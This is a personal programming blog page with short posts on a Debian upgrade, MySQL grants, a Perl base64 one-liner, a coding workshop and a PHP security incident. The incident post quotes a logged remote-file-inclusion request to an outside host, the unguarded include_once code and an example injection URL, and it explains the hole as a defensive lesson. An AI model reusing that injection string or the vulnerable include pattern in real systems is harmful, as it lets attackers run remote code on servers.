WARNING!!! As this site contains some arts' photos such as Michelangelo's David statue which were classed as Indecent Articles by the Government of Hong Kong Special Administrative Region, people who under 18 are not allowed to enter this site.
警告!!!由於本站含有香港特別行政區政府評級為不雅物品之藝術品照片(如米開羅之大衛像),未滿18歲之人士,不得進入本站。

23 March, 2008

參加Impromptu Code Jam

Filed under: Computer, Life, Programming — wanleung @ 1:21 am

3月19日出席了由Agile Hong Kong 辦的WORKSHOP,去體驗PAIR PROGRAMMING。

之後和舊同事以及主辦單位一行13人一同食晚飯。最後回到家中已是零晨1時30分。

覺得這類WORKSHOP不錯,除了可學到不同的知識外,還可識到不少行內人。

而且這類SOLVE PROBLEM的問題,很久沒有做過,做完感覺腦筋好像清晰了不少,很久都沒試過有這樣的感覺。

之前去過不少技術交流的聚會,但像這次需要寫CODE還是第一次。

那個PROGRAM問題,之後我用PERL花了5分鐘寫了20行CODE就完成了,不過得到的答案是2531,5683,這個是有處理字的。而把數字排除在外的話,所得的答案為2534,5691。仍和他們所給的答案2530, 5680有分別。

22 March, 2008

把Debian上lenny(testing)

Filed under: Computer, Debian, Life, Linux, Programming — wanleung @ 1:00 am

終於把家中的WORK STATION和LAPTOP上的DEBAIN, UPGRADE到TESTING VERSION。

GNOME的速度比以前快了些,而字體就比以前減了2個SIZE,應該FIX了上一個版本字體雖SET為同一SIZE,但在GNOME中字體比KDE大的問題。

另外TESTING VERSION中,多了開機動畫。

其他功能還在測試中。

17 February, 2007

Security Issue in PHP - include_once

Filed under: Computer, Linux, Programming — wanleung @ 7:55 pm

There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I go the the php file and know how the cracker crack the system. The problem is about php.

<?php
...
$pagename =$_GET['Name'];

?>

<?php include_once(”{$pagename}_main.inc”);?>

The problem is that the $pagename does not have any gruad to check the value that got by $_Get['name'].

The function of include_once is allow to include the source from outside, http://example.com/aaa.php

So, when cracker use a ‘http://example.org/aaa.txt?’ as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:


<?php include_once("http://example.org/aaa.txt?_main.inc");?>

That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.

So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.

12 June, 2006

Install Perl CPAN Modules in debain

Filed under: Computer, Debian, Linux, Programming — wanleung @ 12:30 pm

To use deb rather than source.
http://www.debian-administration.org/articles/78

23 December, 2005

MySQL

Filed under: Computer, Programming — wanleung @ 2:43 pm

grant update, insert, delete, select on *.* to user@host identified by ‘passwd’;
flush privileges;

1 December, 2005

Decode Base64 mail

Filed under: Computer, Linux, Programming — wanleung @ 6:32 pm

perl -MMIME::Base64 -le ‘$/=undef;print decode_base64( <> )’ foo

31 January, 2005

Final Year Project

Filed under: Computer, Programming — wanleung @ 3:44 pm

I am trying my best to finish my final year project these days.
My final year project is about cryptography.
I need to program at least 3 small programs to show that how the DES, RSA, and MD5 work.

I am still programing the DES and MD5. I need time…

Just so tired, and haven’t sleep for few days…